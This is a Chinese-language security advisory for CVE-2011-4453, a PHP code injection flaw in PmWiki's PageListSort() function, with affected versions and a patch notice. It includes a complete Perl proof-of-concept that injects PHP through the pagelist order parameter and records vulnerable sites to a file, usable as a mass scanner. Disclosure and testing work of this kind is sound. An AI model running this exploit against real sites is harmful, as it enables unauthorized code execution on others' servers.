PmWiki 'PageListSort()'函数PHP代码注入漏洞
发布日期:2011-11-23
更新日期:2011-12-23
受影响系统:PmWiki PmWiki 2.x
不受影响系统:PmWiki PmWiki 2.2.35
描述:
BUGTRAQ ID:
50776
CVE ID:
CVE-2011-4453
PmWiki是一种基于Wiki技术的开源多人协作站点创建和维护工具。
PmWiki在实现上存在PHP代码注入漏洞,攻击者可利用此漏洞注入和执行任意PHP代码。
<*来源:Egidio Romano aka EgiX
*>
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
Egidio Romano aka EgiX ()提供了如下测试方法:
$ cat test.pl
#!/usr/bin/perl -w
#
# *** Autor: ZmEu
# *** Multumiri: haxnet, foonet si blackhat(s).
# *** Testat pe: Mac(darwin 8.11.0).
#
# \"You may stop me, but you can\'t stop us all.\".
#
use LWP::UserAgent;
my $adresa=$ARGV[0] or die("(@)Se foloseste: perl pmwiki.pl
http://example.com/pmwiki/pmwiki.php\n");
my
$incarca="chr%2890%29.chr%28109%29.chr%2869%29.chr%28117%29.chr%2832%29.chr%2848%29.chr%2846%29.chr%2849%29.chr%2832%29.chr%2845%29.chr%2832%29.chr%28112%29.chr%28109%29.chr%28119%29.chr%28105%29.chr%28107%29.chr%28105%29";
$ua=new LWP::UserAgent;
$ua->agent("ZmEu/1.0");
my $pmwikireq=new HTTP::Request POST => $adresa;
$pmwikireq->content_type("application/x-www-form-urlencoded");
$pmwikireq->content("action=edit&n=Cmd.foo&text=%28%3Apagelist+order%3D%27%5D%29%3Berror_reporting%280%29%3Bprint%28$incarca%29%3Bdie%3B%23%3A%29&csum=&author=foo&preview=+Preview+");
my $pmwikires=$ua->request($pmwikireq);
my $zmeu=$pmwikires->as_string;
if($zmeu=~/ZmEu 0.1 - pmwiki/)
{
print "(@)OK:$adresa\n";
open(PMWIKIVULN, ">>vuln.txt");
print PMWIKIVULN ("$adresa\n");
close PMWIKIVULN;
}
else
{
print "BAD:$adresa\n"; #este nevoie de parola.
}
$
建议:
厂商补丁:
PmWiki
------
目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:
http://www.pmwiki.org/浏览次数:2779
严重程度:0(网友投票)
